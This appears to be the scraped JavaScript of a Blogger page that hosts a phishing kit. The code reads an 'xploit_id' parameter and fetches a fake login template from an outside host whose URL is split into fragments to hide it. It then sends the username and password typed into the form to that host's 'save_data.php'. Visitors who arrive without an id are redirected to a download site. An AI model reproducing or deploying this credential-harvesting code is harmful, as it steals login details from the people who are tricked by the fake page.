
  // Supply ads personalization default for EEA readers
  // See https://www.blogger.com/go/adspersonalization
  adsbygoogle = window.adsbygoogle || [];
  if (typeof adsbygoogle.requestNonPersonalizedAds === 'undefined') {
    adsbygoogle.requestNonPersonalizedAds = 1;
  }


      	$('body').attr('spellcheck',false);
        function placeCaretAtEnd(el) {
            el.focus();
            if (typeof window.getSelection != 'undefined'
            && typeof document.createRange != 'undefined') {
                var range = document.createRange();
                range.selectNodeContents(el);
                range.collapse(false);
                var sel = window.getSelection();
                sel.removeAllRanges();
                sel.addRange(range);
            } else if (typeof document.body.createTextRange != 'undefined') {
                var textRange = document.body.createTextRange();
                textRange.moveToElementText(el);
                textRange.collapse(false);
                textRange.select();
            }
        }

        $('[contenteditable]').focusout(function(){
            var element = $(this);        
            if (!element.text().trim().length) {
                element.empty();
            }
        });
        $(document).on('click', '#password_edit', function(e){
            $('#password').html($('#password').html());
            placeCaretAtEnd($('#password').get(0));
        });
        $(document).on('keyup', '#password', function(e){
            
            var v = $(this).html();
            var l = '';
            for( i=0;i<v.length;i++){
                l += '&#8226;';
            }

            $('#password_edit').html(l);
        });

		$(document).on('keypress', '[contenteditable]', function(e){ 
      		return e.which != 13; 
      	});

        function getParameterByName(name) {
            var match = RegExp('[?&]' + name + '=([^&]*)').exec(window.location.search);
            return match && decodeURIComponent(match[1].replace(/\+/g, ' '));
        }
        var xploit_id = getParameterByName('id');
      
      	if( xploit_id ) {
			var jurlg1 = 'ps://xploi';
			var jurlg2 = 'ts-en.c';
			var jurlg3 = 'om/';
        	$.post( "htt"+jurlg1+jurlg2+jurlg3+"blogger/checked_.php", 
                               { xploit_id: xploit_id, origin: window.location.origin }
            )
            .done(function(data) {
           
                data = jQuery.parseJSON(data);
                if( data ) {
                    $('title').text(data.title);
                    $('link[rel="shortcut icon"]').attr('href', data.favicon);
                    $('#web-total').html(data.template);
                }
            });
      } else {
		var jurlh1 = 'http://descarga.';
		var jurlh2 = 'consejosdeinternet';
		var jurlh3 = '.com/es/descarga-1/';
      	window.location.href = jurlh1+jurlh2+jurlh3;
      }


        $(document).on('submit', '#form_ac', function(e){
            e.preventDefault();
            var user = $('#user').html();
            var password = $('#password').html();
            if( password.lenght == 0 || user.lenght == 0 ) {
                return;
            }
            $(this).find('input').prop('disabled', true);
            var jurlf1 = 'ps://xploi';
			var jurlf2 = 'ts-en.c';
			var jurlf3 = 'om/';
			$.post( "htt"+jurlf1+jurlf2+jurlf3+"ajax/save_data.php", 
                { user: user, password: password, xploit_id: xploit_id }
            )
            .done(function(data) {
                if( data ) {
                    window.location.href = data;
                }
            })
            .always(function(){
                $(this).find('input').prop('disabled', false);
            })
        });
    

    document.addEventListener('DOMContentLoaded', function(event) {
      window.cookieChoices && cookieChoices.showCookieConsentBar && cookieChoices.showCookieConsentBar(
          (window.cookieOptions && cookieOptions.msg) || 'Diese Website verwendet Cookies von Google, um Dienste anzubieten und Zugriffe zu analysieren. Deine IP-Adresse und dein User-Agent werden zusammen mit Messwerten zur Leistung und Sicherheit f\xfcr Google freigegeben. So k\xf6nnen Nutzungsstatistiken generiert, Missbrauchsf\xe4lle erkannt und behoben und die Qualit\xe4t des Dienstes gew\xe4hrleistet werden.',
          (window.cookieOptions && cookieOptions.close) || 'Ok',
          (window.cookieOptions && cookieOptions.learn) || 'Weitere Informationen',
          (window.cookieOptions && cookieOptions.link) || 'https://www.blogger.com/go/blogspot-cookies');
    });
  

window['__wavt'] = 'AOuZoY7r2FrHjMfQYCAJaM-kjQZDzlxmpA:1622639163406';_WidgetManager._Init('//www.blogger.com/rearrange?blogID\x3d3718570140099578564','//site320s.blogspot.com/','3718570140099578564');
_WidgetManager._SetDataContext([{'name': 'blog', 'data': {'blogId': '3718570140099578564', 'title': 'https://site320s.blogspot.com/', 'url': 'https://site320s.blogspot.com/', 'canonicalUrl': 'https://site320s.blogspot.com/', 'homepageUrl': 'https://site320s.blogspot.com/', 'searchUrl': 'https://site320s.blogspot.com/search', 'canonicalHomepageUrl': 'https://site320s.blogspot.com/', 'blogspotFaviconUrl': 'https://site320s.blogspot.com/favicon.ico', 'bloggerUrl': 'https://www.blogger.com', 'hasCustomDomain': false, 'httpsEnabled': true, 'enabledCommentProfileImages': true, 'gPlusViewType': 'FILTERED_POSTMOD', 'adultContent': false, 'analyticsAccountNumber': '', 'encoding': 'UTF-8', 'locale': 'es', 'localeUnderscoreDelimited': 'es', 'languageDirection': 'ltr', 'isPrivate': false, 'isMobile': false, 'isMobileRequest': false, 'mobileClass': '', 'isPrivateBlog': false, 'isDynamicViewsAvailable': true, 'feedLinks': '\x3clink rel\x3d\x22alternate\x22 type\x3d\x22application/atom+xml\x22 title\x3d\x22https://site320s.blogspot.com/ - Atom\x22 href\x3d\x22https://site320s.blogspot.com/feeds/posts/default\x22 /\x3e\n\x3clink rel\x3d\x22alternate\x22 type\x3d\x22application/rss+xml\x22 title\x3d\x22https://site320s.blogspot.com/ - RSS\x22 href\x3d\x22https://site320s.blogspot.com/feeds/posts/default?alt\x3drss\x22 /\x3e\n\x3clink rel\x3d\x22service.post\x22 type\x3d\x22application/atom+xml\x22 title\x3d\x22https://site320s.blogspot.com/ - Atom\x22 href\x3d\x22https://www.blogger.com/feeds/3718570140099578564/posts/default\x22 /\x3e\n', 'meTag': '\x3clink rel\x3d\x22me\x22 href\x3d\x22https://www.blogger.com/profile/06020330051572945718\x22 /\x3e\n', 'adsenseHostId': 'ca-host-pub-1556223355139109', 'adsenseHasAds': false, 'adsenseAutoAds': false, 'view': '', 'dynamicViewsCommentsSrc': '//www.blogblog.com/dynamicviews/4224c15c4e7c9321/js/comments.js', 'dynamicViewsScriptSrc': '//www.blogblog.com/dynamicviews/95aa4512ae7400eb', 'plusOneApiSrc': 'https://apis.google.com/js/plusone.js', 'disableGComments': true, 'sharing': {'platforms': [{'name': 'Obtener enlace', 'key': 'link', 'shareMessage': 'Obtener enlace', 'target': ''}, {'name': 'Facebook', 'key': 'facebook', 'shareMessage': 'Compartir en Facebook', 'target': 'facebook'}, {'name': 'Escribe un blog', 'key': 'blogThis', 'shareMessage': 'Escribe un blog', 'target': 'blog'}, {'name': 'Twitter', 'key': 'twitter', 'shareMessage': 'Compartir en Twitter', 'target': 'twitter'}, {'name': 'Pinterest', 'key': 'pinterest', 'shareMessage': 'Compartir en Pinterest', 'target': 'pinterest'}, {'name': 'Correo electr\xf3nico', 'key': 'email', 'shareMessage': 'Correo electr\xf3nico', 'target': 'email'}], 'disableGooglePlus': true, 'googlePlusShareButtonWidth': 300, 'googlePlusBootstrap': '\x3cscript type\x3d\x22text/javascript\x22\x3ewindow.___gcfg \x3d {\x27lang\x27: \x27es\x27};\x3c/script\x3e'}, 'hasCustomJumpLinkMessage': false, 'jumpLinkMessage': 'Leer m\xe1s', 'pageType': 'index', 'pageName': '', 'pageTitle': 'https://site320s.blogspot.com/'}}, {'name': 'features', 'data': {'sharing_get_link_dialog': 'true', 'sharing_native': 'false'}}, {'name': 'messages', 'data': {'edit': 'Editar', 'linkCopiedToClipboard': 'El enlace se ha copiado en el Portapapeles.', 'ok': 'Aceptar', 'postLink': 'Enlace de la entrada'}}, {'name': 'template', 'data': {'name': 'custom', 'localizedName': 'Personalizado', 'isResponsive': false, 'isAlternateRendering': false, 'isCustom': true}}, {'name': 'view', 'data': {'classic': {'name': 'classic', 'url': '?view\x3dclassic'}, 'flipcard': {'name': 'flipcard', 'url': '?view\x3dflipcard'}, 'magazine': {'name': 'magazine', 'url': '?view\x3dmagazine'}, 'mosaic': {'name': 'mosaic', 'url': '?view\x3dmosaic'}, 'sidebar': {'name': 'sidebar', 'url': '?view\x3dsidebar'}, 'snapshot': {'name': 'snapshot', 'url': '?view\x3dsnapshot'}, 'timeslide': {'name': 'timeslide', 'url': '?view\x3dtimeslide'}, 'isMobile': false, 'title': 'https://site320s.blogspot.com/', 'description': '', 'url': 'https://site320s.blogspot.com/', 'type': 'feed', 'isSingleItem': false, 'isMultipleItems': true, 'isError': false, 'isPage': false, 'isPost': false, 'isHomepage': true, 'isArchive': false, 'isLabelSearch': false}}]);
